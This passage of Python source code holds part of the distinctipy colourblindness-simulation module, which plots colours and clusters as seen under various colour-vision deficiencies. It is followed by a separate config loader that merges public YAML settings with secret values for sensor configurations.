    # Apply the colour filter pixel by pixel (alpha channel, if any, dropped).
    filtered_img = np.zeros((n_rows, n_columns, 3))

    for r in range(n_rows):
        for c in range(n_columns):
            filtered_img[r, c] = filter_function(img[r, c, 0:3])

    fig, axes = plt.subplots(1, 2, figsize=(12, 6))

    axes[0].imshow(img)
    axes[1].imshow(filtered_img)

    axes[0].axis("off")
    axes[1].axis("off")

    axes[0].set_title("Normal Vision")
    axes[1].set_title("With " + colorblind_type)

    plt.show()


def colorblind_filter(color, colorblind_type="Deuteranomaly"):
    """
    Transforms an (r,g,b) colour into a simulation of how a person with
    colourblindness would see that colour.

    :param color: rgb colour tuple to convert, components in [0, 1].
    :param colorblind_type: Type of colourblindness to simulate; any key of
        ``fBlind`` ('Normal', 'Protanopia', 'Protanomaly', 'Deuteranopia',
        'Deuteranomaly', 'Tritanopia', 'Tritanomaly', 'Achromatopsia',
        'Achromatomaly').
    :return: the filtered rgb tuple.
    """
    filter_function = fBlind[colorblind_type]

    return filter_function(color)


def simulate_colors(colors, colorblind_type="Deuteranomaly", one_row=None, show=True):
    """
    Simulate the appearance of colors with and without colourblindness.

    :param colors: A list of (r,g,b) colour tuples, with r, g and b floats
        between 0 and 1.
    :param colorblind_type: Type of colourblindness to simulate; any key of
        ``fBlind`` ('Normal', 'Protanopia', 'Protanomaly', 'Deuteranopia',
        'Deuteranomaly', 'Tritanopia', 'Tritanomaly', 'Achromatopsia',
        'Achromatomaly').
    :param one_row: If True display colours on one row, if False as a grid.
        If one_row=None a grid is used when there are more than 8 colours.
    :param show: if True, calls ``plt.show()``.
    :return: None; draws two colour swatches.
    """
    import matplotlib.pyplot as plt

    from distinctipy import distinctipy

    filtered_colors = [colorblind_filter(color, colorblind_type) for color in colors]

    fig, axes = plt.subplots(1, 2, figsize=(8, 4))

    distinctipy.color_swatch(
        colors, ax=axes[0], one_row=one_row, title="Viewed with Normal Sight"
    )

    distinctipy.color_swatch(
        filtered_colors,
        ax=axes[1],
        one_row=one_row,
        title="Viewed with " + colorblind_type + " Colour Blindness",
    )

    if show:
        plt.show()


def simulate_clusters(
    dataset="s2",
    colorblind_type="Deuteranomaly",
    colorblind_distinct=False,
    show=True,
):
    """
    Simulates the appearance of an example clustering dataset with and
    without colourblindness.

    :param dataset: The dataset to display, the options are:

        * s1, s2, s3, s4: 15 clusters with increasing overlaps from s1 to s4
        * a1: 20 clusters
        * a2: 35 clusters
        * a3: 50 clusters
        * b1: 100 clusters

    :param colorblind_type: Type of colourblindness to simulate; any key of
        ``fBlind`` ('Normal', 'Protanopia', 'Protanomaly', 'Deuteranopia',
        'Deuteranomaly', 'Tritanopia', 'Tritanomaly', 'Achromatopsia',
        'Achromatomaly').
    :param colorblind_distinct: If True generate colours to be as distinct
        as possible for colorblind_type. Else generate colours that are as
        distinct as possible for normal vision.
    :param show: if True, calls ``plt.show()``.
    :raises ValueError: if *dataset* is not one of the known names.
    :return: None; draws the two scatter plots.
    """
    import matplotlib.pyplot as plt
    import pandas as pd

    from distinctipy import distinctipy

    if dataset not in ("s1", "s2", "s3", "s4", "a1", "a2", "a3", "b1"):
        raise ValueError("dataset must be s1, s2, s3, s4, a1, a2, a3 or b1")

    # Datasets are fetched from the distinctipy repository at call time.
    URL = (
        "https://raw.githubusercontent.com/alan-turing-institute/distinctipy/"
        "main/distinctipy/datasets/"
    )

    df = pd.read_csv(URL + dataset + ".csv")

    if colorblind_distinct:
        orig_colors = distinctipy.get_colors(
            df["cluster"].nunique(), colorblind_type=colorblind_type
        )
    else:
        orig_colors = distinctipy.get_colors(df["cluster"].nunique())

    orig_cmap = distinctipy.get_colormap(orig_colors)

    filtered_colors = [
        colorblind_filter(color, colorblind_type) for color in orig_colors
    ]

    filtered_cmap = distinctipy.get_colormap(filtered_colors)

    fig, axes = plt.subplots(1, 2, figsize=(10, 5))
    fig.tight_layout(rect=[0, 0.03, 1, 0.95])
    fig.suptitle(str(df["cluster"].nunique()) + " clusters", fontsize=20)

    axes[0].scatter(df["x"], df["y"], c=df["cluster"], cmap=orig_cmap, s=6)
    axes[0].get_xaxis().set_visible(False)
    axes[0].get_yaxis().set_visible(False)
    axes[0].set_title("With Normal Vision")

    axes[1].scatter(df["x"], df["y"], c=df["cluster"], cmap=filtered_cmap, s=6)
    axes[1].get_xaxis().set_visible(False)
    axes[1].get_yaxis().set_visible(False)
    axes[1].set_title("With " + colorblind_type + " Colourblindness")

    if show:
        plt.show()


def _main():
    # Demo entry point: show 36 distinct colours under Deuteranomaly.
    from distinctipy import distinctipy

    colors = distinctipy.get_colors(36)
    simulate_colors(colors, "Deuteranomaly")


if __name__ == "__main__":
    _main()
from socutils import get_settings, exceptions
import logging
import sys
import os

logger = logging.getLogger("configer")


def read_setting(path):
    """Load a YAML settings file via socutils; exit the process if missing.

    :param path: path of the settings file to read.
    :return: the parsed settings mapping.
    """
    try:
        config = get_settings(path)
    except exceptions.SettingsFileNotExistError:
        logger.error(f'{path} Not found')
        sys.exit(1)
    return config


class PrivacyManager:
    """Merges a public config with its private ('secret') counterpart.

    Values equal to the '<privacy>' placeholder in the public config are
    replaced by the value stored under the same dotted key path in the
    private config.
    """

    def __init__(self, cpath='/appconfig', public_config_name="setting", privacy_config_name="secret"):
        self.public_config = read_setting(f'{cpath}/{public_config_name}.yaml')
        self.__privacy_data = read_setting(f'{cpath}/secure/{privacy_config_name}.yaml')

    def __get_secret(self, key_path):
        """Fetch the private value for *key_path* from the secure config.

        Returns False (best effort, logged as critical) when the key is
        absent rather than raising.
        """
        if key_path not in self.__privacy_data:
            # BUGFIX: message typo 'Not fount' -> 'Not found'.
            logger.critical(f'Not found {key_path} in privacy_config')
            return False
        return self.__privacy_data.get(key_path)

    def __get_recursively(self, search_dict, field, d_path=None):
        """Return the dotted key paths of every value equal to *field*.

        :param search_dict: (possibly nested) mapping to scan.
        :param field: the placeholder value to look for.
        :param d_path: dotted prefix accumulated during recursion.
        """
        paths_to_fields = []
        for key, value in search_dict.items():
            if value == field:
                if not d_path:
                    paths_to_fields.append(key)
                if d_path:
                    paths_to_fields.append(d_path + '.' + key)
            elif isinstance(value, dict):
                if d_path:
                    key = d_path + '.' + key
                results = self.__get_recursively(value, field, key)
                for result in results:
                    paths_to_fields.append(result)
        return paths_to_fields

    def get_production_config(self):
        """Return the public config with every '<privacy>' placeholder
        substituted by its secret value."""
        from copy import deepcopy
        # Work on a copy so the original public config stays untouched.
        prod_setting = deepcopy(self.public_config)

        def set_val(path='', new_val=None):
            """Set *new_val* at the dotted key *path* inside prod_setting.

            Purely numeric path components are treated as list indices.
            """
            if '.' in path:
                chunks = path.split('.')
                chunks.reverse()
                val = prod_setting
                # Walk down to the container holding the final key.
                while len(chunks) > 1:
                    chunk = chunks.pop()
                    if chunk.isdigit():
                        val = val[int(chunk)]
                    else:
                        val = val[chunk]
                if chunks[0].isdigit():
                    val[int(chunks[0])] = new_val
                else:
                    val[chunks[0]] = new_val
                return True
            # Single-segment path: direct top-level assignment.
            try:
                prod_setting[path] = new_val
                return True
            except (KeyError, IndexError):
                return False

        paths = self.__get_recursively(prod_setting, '<privacy>')
        for path in paths:
            secret = self.__get_secret(path)
            set_val(path=path, new_val=secret)
        return prod_setting


def configer():
    """Build the combined unicon configuration for the current environment.

    Resolves the config directory from GLOBAL_ENV, loads the base
    'unicon-setting.yaml' and merges one production config per sensor
    YAML file under the 'sensors' key.
    """
    global_env = os.environ.get('GLOBAL_ENV')
    logger.debug(f'Global environment {global_env}')
    if not global_env:
        if os.path.exists('/opt/unicon/data'):
            logger.debug('Get settings from sdata')
            cpath = '/opt/unicon/data'
        else:
            # BUGFIX: message typo 'appconfing' -> 'appconfig'.
            logger.debug('Get settings from appconfig')
            cpath = '/opt/localconfigs/unicon/appconfig'
    elif global_env == 'docker':
        cpath = '/appconfig'
    else:
        # BUGFIX: message typo 'ERRRO' -> 'ERROR'.
        print('ERROR::Unknown Environment')
        sys.exit(1)

    config = read_setting(f'{cpath}/unicon-setting.yaml')

    def _get_cfg_list():
        """Return the sensor config basenames (every *.yaml in cpath except
        the base unicon-setting file).

        FYI: kept as a separate step — it will be needed when this is
        reworked for multithreading.
        """
        config.update({'sensors': {}})
        conf_files = filter(lambda x: x.endswith('.yaml') and not x.startswith('unicon-setting'),
                            os.listdir(path=f"{cpath}"))
        cfg_list = list(map(lambda line: line.split('.')[0], conf_files))
        return cfg_list

    _sensors = _get_cfg_list()
    if len(_sensors) == 0:
        # No sensor (AV) configs found at all.
        logger.error('Нет ни единого конфига АВ!')
    for conf_sensor in _sensors:
        pm = PrivacyManager(cpath=cpath, public_config_name=conf_sensor,
                            privacy_config_name=conf_sensor)
        # Simplified from update({**config['sensors'], **prod}): re-merging
        # the dict into itself was a no-op.
        config['sensors'].update(pm.get_production_config())
    return config